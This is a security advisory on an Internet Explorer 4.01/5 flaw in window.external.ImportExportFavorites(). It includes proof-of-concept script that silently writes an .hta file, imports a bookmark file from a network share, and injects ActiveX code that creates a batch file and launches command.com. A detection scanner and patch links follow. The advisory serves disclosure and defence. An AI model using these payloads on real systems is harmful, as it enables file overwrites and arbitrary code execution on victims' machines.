COMMAND
IE
SYSTEMS AFFECTED
Microsoft Internet Explorer 4.01 and 5
PROBLEM
Georgi Guninski found the following. Internet Explorer 5.0 under
Windows 95/NT 4.0 (Windows 98 is presumably vulnerable as well)
allows creating and overwriting local files using the
window.external.ImportExportFavorites() method, and in SOME cases
also putting content into them, which means arbitrary programs may
be executed.
The problem is the window.external.ImportExportFavorites() method,
which is used to import and export bookmarks from and to Netscape
Communicator. The bigger problem is that it allows creating and
overwriting files, which obviously leads to a dangerous DoS
attack: one may overwrite critical files, which may mean
reinstalling Windows. An example:
<SCRIPT>
window.external.ImportExportFavorites(0,"c:\\fav.hta");
</SCRIPT>
which will create a file c:\fav.hta containing IE's favorites
without asking the user, merely notifying him that the operation was
successful. In SOME cases, HTML code may be injected into the
exported file by importing a specially designed HTML file. The
file to be imported may reside on a Samba or Windows file server
and may be accessed via Microsoft Networking. The difficult part
is that the injected content must survive export through nothing
but <A> tags, but HTML Applications help again.
Georgi has verified importing on a Windows NT 4.0 box directly
connected to the Internet, and it worked fine. He could not,
however, reproduce importing favorites with Windows 95 connected to
the Internet via dial-up.
It is also possible to import the file (favorites) using the "http"
protocol, but then the user must click the default button YES;
Microsoft does not warn about any security problem in this case.
So the code looks like this (in an HTML file):
<SCRIPT>
// you must change the IP or make the file local !!!!!!!!!!
window.external.ImportExportFavorites(1,"\\\\1.1.1.1\\test\\fav.imp");
// Sure, the StartUp folder is better
window.external.ImportExportFavorites(0,"c:\\fav.hta");
</SCRIPT>
In the imported file (fav.imp), residing on a Samba or Windows
server that requires no authentication:
<!DOCTYPE NETSCAPE-Bookmark-file-1>
<DL>
<DT><A HREF="#" STYLE="left:expression(eval('f= new
ActiveXObject(\'Scripting.FileSystemObject\');a=f.CreateTextFile(\'C:\\\\GTEST.BAT\',true);a.WriteLine(\'echo
Hi\');a.WriteLine(\'pause\');a.close();alert(\'File C:\\\\GTEST.BAT
created\');window.close();'));" ADD_DATE="923225094"
LAST_VISIT="934146000" LAST_MODIFIED="923225096">123456</A>
<DT><A HREF="#" STYLE="left:expression(eval('a=new
ActiveXObject(\'WScript.Shell\');a.run(\'c:\\command.com\');alert(\'Program
started\');window.close()'));" ADD_DATE="923225094"
LAST_VISIT="934146000" LAST_MODIFIED="923225096">123455</A>
</DL>
To see the effect, start c:\fav.hta (it may be placed in the
StartUp folder and executed automatically). This vulnerability
can be exploited via an email or Usenet message using window.open().
The user must have file sharing installed in order for remote
importing to work. A demonstration is available at:
http://www.nat.bg/~joro/imp.html
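The two ingredients described above can be checked for mechanically. The following scanner is an added example (my own code, not from the advisory, Georgi Guninski, or Microsoft): it flags markup that calls window.external.ImportExportFavorites() and bookmark files whose <A> entries carry a CSS expression() in STYLE. The sample inputs are constructed, and 192.0.2.10 is a placeholder address.

```javascript
// Added detection example; not code from the advisory or from Microsoft.
// Flags a page calling window.external.ImportExportFavorites() and a
// Netscape bookmark file whose <A> entries carry expression() in STYLE.
const CALL_RE =
  /window\.external\.ImportExportFavorites\s*\(\s*(\d+)\s*,\s*"((?:[^"\\]|\\.)*)"\s*\)/gi;
const EXPR_RE = /<A\b[^>]*\bSTYLE\s*=\s*"[^"]*\bexpression\s*\(/gi;

// Turn the JScript string literal body back into the real path (\\ -> \).
function unescapeJsString(body) {
  return body.replace(/\\(.)/g, '$1');
}
// Mode 0 exports favorites to a local file, mode 1 imports from a file.
// Red flags from the advisory: UNC import source, .hta export target.
function findImportExportCalls(markup) {
  const findings = [];
  for (const m of markup.matchAll(CALL_RE)) {
    const mode = Number(m[1]);
    const path = unescapeJsString(m[2]);
    findings.push({
      mode,
      path,
      writesLocalFile: mode === 0,
      unc: path.startsWith('\\\\'),
      hta: /\.hta$/i.test(path),
    });
  }
  return findings;
}

// Bookmark entries with expression() in STYLE are the injection vector:
// IE evaluates the expression as script once the exported file is opened.
function findExpressionStyles(bookmarks) {
  return Array.from(bookmarks.matchAll(EXPR_RE), (m) => m[0]);
}

// Constructed samples modelled on the advisory's snippets
// (192.0.2.10 is a documentation address, not a real server).
const SAMPLE_PAGE = [
  '<SCRIPT>',
  'window.external.ImportExportFavorites(1,"\\\\\\\\192.0.2.10\\\\test\\\\fav.imp");',
  'window.external.ImportExportFavorites(0,"c:\\\\fav.hta");',
  '</SCRIPT>',
].join('\n');
const SAMPLE_BOOKMARKS = [
  '<!DOCTYPE NETSCAPE-Bookmark-file-1>',
  '<DL>',
  '<DT><A HREF="http://example.com/" ADD_DATE="923225094">Plain entry</A>',
  '<DT><A HREF="#" STYLE="left:expression(0)" ADD_DATE="923225094">Injected</A>',
  '</DL>',
].join('\n');
```

Run findImportExportCalls(SAMPLE_PAGE) and findExpressionStyles(SAMPLE_BOOKMARKS) to see the import-from-UNC call, the .hta export and the injected entry reported.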
SOLUTION
Disable Active Scripting.
Patch availability:
- Internet Explorer 4.01 for Intel:
ftp://ftp.microsoft.com/peropsys/ie/ie-public/fixes/usa/IE401/ImportExportFavorites-fix/x86/q241361.exe
- Internet Explorer 4.01 for Alpha:
ftp://ftp.microsoft.com/peropsys/ie/ie-public/fixes/usa/IE401/ImportExportFavorites-fix/Alpha/q241361.exe
- Internet Explorer 5 for Intel:
ftp://ftp.microsoft.com/peropsys/ie/ie-public/fixes/usa/IE50/ImportExportFavorites-fix/x86/q241361.exe
- Internet Explorer 5 for Alpha:
ftp://ftp.microsoft.com/peropsys/ie/ie-public/fixes/usa/IE50/ImportExportFavorites-fix/Alpha/q241361.exe